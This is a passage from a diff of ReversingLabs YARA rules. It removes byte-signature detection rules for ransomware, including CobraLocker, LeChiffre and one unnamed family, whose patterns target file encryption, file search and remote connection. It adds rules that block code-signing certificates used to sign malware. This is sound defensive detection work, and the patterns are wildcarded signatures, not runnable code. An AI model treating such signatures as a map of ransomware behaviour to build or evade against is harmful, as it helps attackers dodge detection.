-            ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 53 56 E8 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 33 C9
-            03 C6 13 CB 83 E8 ?? 89 45 ?? 83 D9 ?? 89 4D ?? 6A ?? 8B 55 ?? 52 6A ?? 6A ?? 6A ??
-            57 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 6A ?? FF 15 ??
-            ?? ?? ?? 83 C4 ?? 8B F0 66 0F 57 C0 66 0F 13 45 ?? 8B 5D ?? 8B 7D ?? 90 83 7D ?? ??
-            0F 8C ?? ?? ?? ?? 7F ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? 8B D3 83 C2 ?? 8B 75 ?? 8B CE
-            83 D1 ?? 8B 45 ?? 3B C8 7F ?? 7C ?? 3B 55 ?? 77 ?? BF ?? ?? ?? ?? 33 C0 8B 75 ?? 03
-        }
-		$encrypt_files_p2 = {
-            F3 8B DA 89 4D ?? EB ?? 8B 7D ?? 2B FB 1B C6 8B 55 ?? 8D 34 13 03 DF 11 45 ?? 89 5D
-            ?? 89 45 ?? 89 7D ?? 83 7D ?? ?? 7F ?? 7C ?? 83 7D ?? ?? 73 ?? 8B 4D ?? 89 4D ?? 83
-            F9 ?? 7D ?? C6 04 31 ?? 41 EB ?? 29 7D ?? 19 45 ?? 33 C0 89 45 ?? 83 F8 ?? 7D ?? 8B
-            0C 85 ?? ?? ?? ?? 31 0C 86 40 EB ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 85 C0 74
-            ?? 88 04 37 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 01
-            0D ?? ?? ?? ?? 8B 55 ?? 11 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 0D ?? ?? ?? ?? 51 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? EB ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 FF
-            15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF 15 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B
-            4D ?? 8D 95 ?? ?? ?? ?? 0F B7 01 66 89 02 83 C1 ?? 83 C2 ?? 66 85 C0 75 ?? 6A ?? 8D
-            95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 C0 ?? 74 ?? 8B D0 8D B5 ?? ?? ?? ??
-            0F B7 0A 66 89 0E 83 C2 ?? 83 C6 ?? 66 85 C9 75 ?? 33 C9 66 89 08 8D 95 ?? ?? ?? ??
-            52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ??
-            ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF
-            15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? EB ?? B8 ?? ?? ?? ?? C3 8B 65 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
-        }
-		$search_files_p1 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 33 D2 56 50 66 89 94 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 56 52
-            66 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 56 50 89
-            74 24 ?? E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 68
-            ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 8D 94 24 ?? ?? ?? ?? 8B C7 2B D7 8D 9B ?? ?? ?? ?? 0F B7 08 66 89 0C 02 83 C0
-            ?? 66 3B CE 75 ?? 8D 84 24 ?? ?? ?? ?? 83 C0 ?? 8D A4 24 ?? ?? ?? ?? 66 8B 48 ?? 83
-            C0 ?? 66 3B CE 75 ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 08 66 8B 0D ?? ?? ?? ??
-            89 50 ?? 68 ?? ?? ?? ?? 66 89 48 ?? FF 15 ?? ?? ?? ?? 8D 54 24 ?? 52 8D 84 24 ?? ??
-            ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5
-            5D C2 ?? ?? 8D A4 24 ?? ?? ?? ?? 8B 7D ?? 8B 35 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 68 ??
-            ?? ?? ?? 51 FF D6 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 68 ?? ?? ?? ??
-            52 FF D6 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 8D 44 24
-            ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 0F 84 ?? ?? ?? ?? 66 83 3D ?? ??
-            ?? ?? ?? BF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B C7 8D 50 ?? EB ?? 8D 9B ?? ?? ?? ?? 66
-            8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 8B CB D1 F8 8D 71 ?? 66 8B 11 83 C1 ?? 66 85 D2
-        }
-		$search_files_p2 = {
-            75 ?? 2B CE D1 F9 3B C1 75 ?? 53 57 FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 66 8B 0F
-            83 C7 ?? 66 85 C9 75 ?? 66 39 0F 75 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 64 8B 15 ?? ?? ?? ?? 8B 32 8B 55 ?? 83 C4 ?? 8D 4C 24 ?? 51 52 68 ?? ?? ?? ?? 50
-            89 46 ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 F8 ?? 7D ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            8B 4E ?? 6A ?? 6A ?? 51 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 15 ?? ?? ??
-            ?? 89 04 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF
-            D3 8B F8 6A ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 8B 56 ?? 6A ?? 6A ?? 52 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D3 8B 0D ?? ?? ?? ?? 89
-            04 8D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 04 95 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 8D 4C 24 ?? 51 57 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF 15 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? 48 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF D6 83 C4 ?? 85
-            C0 0F 84 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 8D 9B ?? ?? ?? ?? 0F B7 8C 04 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83
-            C0 ?? 66 85 C9 75 ?? 8D BC 24 ?? ?? ?? ?? 83 C7 ?? 66 8B 47 ?? 83 C7 ?? 66 85 C0 75
-            ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 A5
-            FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 54 24 ?? 52
-            50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 56 FF 15
-      }
-		$remote_connection = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 45 ?? 8B 0D ?? ?? ?? ?? 0F B6 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 3D ??
-            ?? ?? ?? 8D 70 ?? 8B 00 56 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 52 0F B7 15 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 51 52 50
-            6A ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF D7 83 C4 ?? 80 3E ?? 74 ?? B9 ?? ?? ??
-            ?? 8B C6 EB ?? 8D 49 ?? C6 00 ?? 40 49 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 8D 50 ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 8D 8D ?? ?? ?? ?? 51 2B C2
-            50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF D7 8D 85 ??
-            ?? ?? ?? 83 C4 ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 6A ?? 2B C2 50 8D 85 ?? ?? ?? ?? 50
-            53 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 9B ?? ?? ?? ?? C6 00 ?? 40
-            49 75 ?? 53 FF 15 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C2
-      }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "47:0d:6c:e2:1a:69:40:32:02:61:f0:9e" and 1474523038 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_7E6Bc7E5A49E2C28E6F5D042 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "a7b815d9-e247-5de1-9bcb-96294b3b91c0"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13076-L13092"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "f378c490ff4f32fc095c822f75abac44a8d94327404cd97546c63e7441e07632"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $remote_connection and ( all of ( $search_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shang Hai Jian Ji Wang Luo Ke Ji You Xian Gong Si" and pe.signatures [ i ] . serial == "7e:6b:c7:e5:a4:9e:2c:28:e6:f5:d0:42" and 1560995284 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Cobralocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4C5020899147C850196C4Ebf : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects CobraLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "dada6370-3ae3-5931-ba9f-da56ebbcd8c8"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "8ac60604-6548-5f11-bf89-ec7e927b20f7"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Bytecode.MSIL.Ransomware.CobraLocker.yara#L1-L59"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13094-L13110"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "95f4c645c7c237d23b5028f824f78a5f9f8f0a4737b391d877582afe08264d7e"
+		logic_hash = "112e834a24c50d639f8607740faa609f1a36539058357544e5dbcddf841f3116"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "CobraLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 00 73 ??
-            ?? ?? ?? 0D 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
-            03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
-            09 17 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 02 16 02
-            8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DD ?? ?? ?? ?? 11 ?? 38 ?? ?? ?? ??
-            38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 08 6F ?? ?? ?? ?? 0A 00 DD ??
-            ?? ?? ?? 09 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 00 DC 00 DD
-            ?? ?? ?? ?? 08 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 00 DC 06
-            13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 11 ?? 2A
-        }
-		$find_files = {
-            16 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            0C 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 06 72 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 08 72 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ??
-            ?? ?? ?? 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17
-            28 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ??
-            00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69
-            FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ??
-            ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ??
-            ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11
-            ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ??
-            6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ??
-            ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ??
-            16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ??
-            ?? ?? 3A ?? ?? ?? ?? 2A
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "4c:50:20:89:91:47:c8:50:19:6c:4e:bf" and 1476693792 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_4Efcf7Adc21F070E590D49Ddb8081397 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "df467418-9d57-5ad0-b396-2ef519a22989"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13112-L13128"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "d60a5bbd50484d620ab60cfd40840abc541c2b7bc1005a9076b69ddd1b938652"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ding Ruan" and pe.signatures [ i ] . serial == "4e:fc:f7:ad:c2:1f:07:0e:59:0d:49:dd:b8:08:13:97" and 1476921600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Lechiffre : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Cbd37C0A651913Ee25A6860D7D5Ccdf2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects LeChiffre ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5d2698fe-9a0b-549d-9a83-72e2ccfc1966"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "e56205d6-9f02-5a8a-8dd3-b8c323fba4bf"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.LeChiffre.yara#L1-L123"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13130-L13148"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0b96f5f48700f2cba22da91187b3111946074e9cc58a502f25d7b96059a043cb"
+		logic_hash = "77cc439aea6eaa5a835b6b1aa50904c1df0d5379228e424ab2d68a3cb654834c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "LeChiffre"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_1 = {
-            55 8B EC 33 C9 51 51 51 51 51 51 51 53 56 57 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
-            30 64 89 20 8B 45 ?? 33 D2 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
-            ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45
-            ?? 8B 08 FF 51 ?? 8B 45 ?? 8B 10 FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 8D 4D ?? 8B
-            D3 8B 45 ?? 8B 38 FF 57 ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 45
-            ?? 50 8D 4D ?? 8B D3 8B 45 ?? 8B 38 FF 57 ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 E8 ?? 50 8D 4D ?? 8B D3 8B 45 ?? 8B 38 FF 57 ?? 8B 45 ?? BA ?? ?? ?? ?? 59 E8 ??
-            ?? ?? ?? 43 4E 75 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
-            8B 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$remote_connection_2 = {
-            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33
-            C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? 8B 80 ?? ?? ?? ?? 66 BE ?? ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8
-            ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$remote_connection_3 = {
-            E8 ?? ?? ?? ?? 8B 45 ?? 8B 80 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 E8 ?? ??
-            ?? ?? DD 5D ?? 9B FF 75 ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ??
-            ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ??
-            8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? FF
-            75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 4D
-            ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B
-            45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$encrypt_files_1 = {
-            E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ??
-            8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8
-            ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 55 ??
-            8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? 83 7B ?? ?? 0F 84 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B
-            03 E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 03 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF 86 ?? ??
-            ?? ?? B2 ?? 8B 86 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 03 E8 ?? ?? ?? ?? FF 75 ??
-            68 ?? ?? ?? ?? 8B 43 ?? C1 E8 ?? 33 D2 52 50 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ??
-            ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 86 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 03 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$encrypt_files_2 = {
-            E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? 8B 12 8B 92 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 8B 55 ?? E8 ?? ?? ?? ?? 3D ??
-            ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? FF 70 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ??
-            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 8B 40
-            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
